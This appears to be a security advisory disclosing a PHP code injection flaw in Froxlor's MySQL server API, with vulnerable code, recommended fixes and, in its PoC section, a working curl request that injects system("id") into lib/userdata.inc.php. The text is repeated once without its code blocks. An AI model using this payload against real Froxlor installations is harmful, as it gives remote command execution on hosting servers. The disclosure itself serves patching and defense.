Summary
PhpHelper::parseArrayToString() writes string values into single-quoted PHP string literals without escaping single quotes. When an admin with change_serversettings permission adds or updates a MySQL server via the API, the privileged_user parameter (which has no input validation) is written unescaped into lib/userdata.inc.php. Since this file is required on every request via Database::getDB(), an attacker can inject arbitrary PHP code that executes as the web server user on every subsequent page load.
Details
The root cause is in PhpHelper::parseArrayToString() at lib/Froxlor/PhpHelper.php:486:
// lib/Froxlor/PhpHelper.php:475-487
foreach ($array as $key => $value) {
if (!is_array($value)) {
if (is_bool($value)) {
$str .= self::tabPrefix($depth, sprintf("'%s' => %s,\n", $key, $value ? 'true' : 'false'));
} elseif (is_int($value)) {
$str .= self::tabPrefix($depth, "'{$key}' => $value,\n");
} else {
if ($key == 'password') {
// special case for passwords (nowdoc)
$str .= self::tabPrefix($depth, "'{$key}' => <<<'EOT'\n{$value}\nEOT,\n");
} else {
// VULNERABLE: $value interpolated without escaping single quotes
$str .= self::tabPrefix($depth, "'{$key}' => '{$value}',\n");
}
}
}
}
Note that the password key receives special treatment via nowdoc syntax (line 484), which is safe because nowdoc does not interpret any escape sequences or variable interpolation. However, all other string keys — including user, caption, and caFile — are written directly into single-quoted PHP string literals with no escaping.
The attack path through MysqlServer::add() (lib/Froxlor/Api/Commands/MysqlServer.php:80):
validateAccess() (line 82) checks the caller is an admin with change_serversettings
privileged_user is read via getParam() at line 88 with no validation applied
mysql_ca is also read with no validation at line 86
- The values are placed into the
$sql_root array at lines 150-160
generateNewUserData() is called at line 162, which calls PhpHelper::parseArrayToPhpFile() → parseArrayToString()
- The result is written to
lib/userdata.inc.php via file_put_contents() (line 548)
- Setting
test_connection=0 (line 92, 110) skips the PDO connection test, so no valid MySQL credentials are needed
The generated userdata.inc.php is loaded on every request via Database::getDB() at lib/Froxlor/Database/Database.php:431:
require Froxlor::getInstallDir() . "/lib/userdata.inc.php";
The MysqlServer::update() method (line 337) has the identical vulnerability with privileged_user at line 387.
PoC
Step 1: Inject PHP code via MysqlServer.add API
curl -s -X POST https://froxlor.example/api.php \
-u 'ADMIN_APIKEY:ADMIN_APISECRET' \
-H 'Content-Type: application/json' \
-d '{
"command": "MysqlServer.add",
"params": {
"mysql_host": "127.0.0.1",
"mysql_port": 3306,
"privileged_user": "x'\''.system(\"id\").'\''",
"privileged_password": "anything",
"description": "test",
"test_connection": 0
}
}'
This writes the following into lib/userdata.inc.php:
'user' => 'x'.system("id").'',
Step 2: Trigger code execution
Any subsequent HTTP request to the Froxlor panel triggers Database::getDB(), which requires userdata.inc.php, executing system("id") as the web server user:
curl -s https://froxlor.example/
The id output will appear in the response (or can be captured via out-of-band methods for blind execution).
Step 3: Cleanup (attacker would also clean up)
The injected code runs on every request until userdata.inc.php is regenerated or manually fixed.
Impact
An admin with change_serversettings permission can escalate to arbitrary OS command execution as the web server user. This represents a scope change from the Froxlor application boundary to the underlying operating system:
- Full server compromise: Execute arbitrary commands as the web server user (typically
www-data)
- Data exfiltration: Read all hosted customer data, databases credentials, TLS private keys
- Lateral movement: Access all MySQL databases using credentials stored in
userdata.inc.php
- Persistent backdoor: The injected code executes on every request, providing persistent access
- Denial of service: Malformed PHP in
userdata.inc.php can break the entire panel
The description field (validated with REGEX_DESC_TEXT = /^[^\0\r\n<>]*$/) and mysql_ca field (no validation) are also injectable vectors through the same code path.
Recommended Fix
Escape single quotes in PhpHelper::parseArrayToString() before interpolating values into single-quoted PHP string literals. In single-quoted PHP strings, only \' and \\ are interpreted, so both must be escaped:
// lib/Froxlor/PhpHelper.php:486
// Before (vulnerable):
$str .= self::tabPrefix($depth, "'{$key}' => '{$value}',\n");
// After (fixed) - escape backslashes first, then single quotes:
$escaped = str_replace(['\\', "'"], ['\\\\', "\\'"], $value);
$str .= self::tabPrefix($depth, "'{$key}' => '{$escaped}',\n");
Alternatively, use the same nowdoc syntax already used for passwords for all string values, which provides complete injection safety:
// Apply nowdoc to all string values, not just passwords:
$str .= self::tabPrefix($depth, "'{$key}' => <<<'EOT'\n{$value}\nEOT,\n");
Additionally, consider adding input validation to privileged_user and mysql_ca in MysqlServer::add() and MysqlServer::update() as defense-in-depth.
References
Summary
PhpHelper::parseArrayToString()writes string values into single-quoted PHP string literals without escaping single quotes. When an admin withchange_serversettingspermission adds or updates a MySQL server via the API, theprivileged_userparameter (which has no input validation) is written unescaped intolib/userdata.inc.php. Since this file isrequired on every request viaDatabase::getDB(), an attacker can inject arbitrary PHP code that executes as the web server user on every subsequent page load.Details
The root cause is in
PhpHelper::parseArrayToString()atlib/Froxlor/PhpHelper.php:486:Note that the
passwordkey receives special treatment via nowdoc syntax (line 484), which is safe because nowdoc does not interpret any escape sequences or variable interpolation. However, all other string keys — includinguser,caption, andcaFile— are written directly into single-quoted PHP string literals with no escaping.The attack path through
MysqlServer::add()(lib/Froxlor/Api/Commands/MysqlServer.php:80):validateAccess()(line 82) checks the caller is an admin withchange_serversettingsprivileged_useris read viagetParam()at line 88 with no validation appliedmysql_cais also read with no validation at line 86$sql_rootarray at lines 150-160generateNewUserData()is called at line 162, which callsPhpHelper::parseArrayToPhpFile()→parseArrayToString()lib/userdata.inc.phpviafile_put_contents()(line 548)test_connection=0(line 92, 110) skips the PDO connection test, so no valid MySQL credentials are neededThe generated
userdata.inc.phpis loaded on every request viaDatabase::getDB()atlib/Froxlor/Database/Database.php:431:The
MysqlServer::update()method (line 337) has the identical vulnerability withprivileged_userat line 387.PoC
Step 1: Inject PHP code via MysqlServer.add API
This writes the following into
lib/userdata.inc.php:Step 2: Trigger code execution
Any subsequent HTTP request to the Froxlor panel triggers
Database::getDB(), whichrequiresuserdata.inc.php, executingsystem("id")as the web server user:The
idoutput will appear in the response (or can be captured via out-of-band methods for blind execution).Step 3: Cleanup (attacker would also clean up)
The injected code runs on every request until
userdata.inc.phpis regenerated or manually fixed.Impact
An admin with
change_serversettingspermission can escalate to arbitrary OS command execution as the web server user. This represents a scope change from the Froxlor application boundary to the underlying operating system:www-data)userdata.inc.phpuserdata.inc.phpcan break the entire panelThe
descriptionfield (validated withREGEX_DESC_TEXT = /^[^\0\r\n<>]*$/) andmysql_cafield (no validation) are also injectable vectors through the same code path.Recommended Fix
Escape single quotes in
PhpHelper::parseArrayToString()before interpolating values into single-quoted PHP string literals. In single-quoted PHP strings, only\'and\\are interpreted, so both must be escaped:Alternatively, use the same nowdoc syntax already used for passwords for all string values, which provides complete injection safety:
Additionally, consider adding input validation to
privileged_userandmysql_cainMysqlServer::add()andMysqlServer::update()as defense-in-depth.References